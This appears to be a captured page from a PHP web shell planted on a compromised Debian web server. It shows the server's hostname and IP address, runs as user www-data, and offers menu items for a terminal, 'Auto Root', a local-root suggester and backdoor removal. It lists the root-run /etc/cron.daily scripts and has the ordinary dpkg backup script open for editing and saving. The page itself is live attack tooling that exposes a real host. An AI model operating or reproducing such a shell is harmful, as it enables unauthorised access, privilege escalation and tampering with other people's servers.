Linux vps-61133.fhnet.fr 4.9.0-19-amd64 #1 SMP Debian 4.9.320-2 (2022-06-30) x86_64
Apache/2.4.25 (Debian)
Server IP : 93.113.207.21 & Your IP : 216.73.216.35
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
etc /
cron.daily /
Delete
Unzip
Name
Size
Permission
Date
Action
.placeholder
102
B
-rw-r--r--
2015-05-03 15:25
00logwatch
268
B
-rwxr-xr-x
2017-01-21 17:29
0anacron
311
B
-rwxr-xr-x
2017-05-29 18:36
apache2
539
B
-rwxr-xr-x
2019-06-16 11:49
apt-compat
1.44
KB
-rwxr-xr-x
2017-06-01 10:50
backup-manager
111
B
-rwxr-x--x
2020-11-17 09:19
bsdmainutils
355
B
-rwxr-xr-x
2016-10-25 10:42
crowdsec
270
B
-rwxr-xr-x
2024-05-31 11:12
dpkg
1.56
KB
-rwxr-xr-x
2017-02-22 22:50
exim4-base
4.03
KB
-rwxr-xr-x
2018-02-10 09:26
locate
2.16
KB
-rwxr-xr-x
2014-04-13 16:12
logrotate
89
B
-rwxr-xr-x
2015-05-06 00:18
man-db
1.04
KB
-rwxr-xr-x
2016-12-13 14:09
mdadm
539
B
-rwxr-xr-x
2016-07-26 17:41
ntp
1.35
KB
-rwxr-xr-x
2018-02-15 12:45
passwd
249
B
-rwxr-xr-x
2017-05-17 13:59
quota
349
B
-rwxr-xr-x
2018-02-01 12:55
rkhunter
979
B
-rwxr-xr-x
2017-07-12 05:07
Save
Rename
#!/bin/sh dbdir=/var/lib/dpkg # Backup the 7 last versions of dpkg databases containing user data. if cd /var/backups ; then # We backup all relevant database files if any has changed, so that # the rotation number always contains an internally consistent set. dbchanged=no dbfiles="arch status diversions statoverride" for db in $dbfiles ; do if ! cmp -s dpkg.${db}.0 $dbdir/$db ; then dbchanged=yes break; fi done if [ "$dbchanged" = "yes" ] ; then for db in $dbfiles ; do [ -e $dbdir/$db ] || continue cp -p $dbdir/$db dpkg.$db savelog -c 7 dpkg.$db >/dev/null done fi # The alternatives database is independent from the dpkg database. dbalt=alternatives # Switch the alternatives database backups from xz to gzip, as the latter # is Essential and we can rely on it being always present, using xz here # is not worth the trouble, disk space savings, or possible additional # dependencies. for dbseq in `seq 1 6` ; do dbfile=${dbalt}.tar.${dbseq} [ -e "${dbfile}.xz" ] || continue unxz ${dbfile}.xz gzip -9 $dbfile done # XXX: Ideally we'd use --warning=none instead of discarding stderr, but # as of GNU tar 1.27.1, it does not seem to work reliably (see #749307). if ! test -e ${dbalt}.tar.0 || ! tar -df ${dbalt}.tar.0 -C $dbdir $dbalt >/dev/null 2>&1 ; then tar -cf ${dbalt}.tar -C $dbdir $dbalt >/dev/null 2>&1 savelog -c 7 ${dbalt}.tar >/dev/null fi fi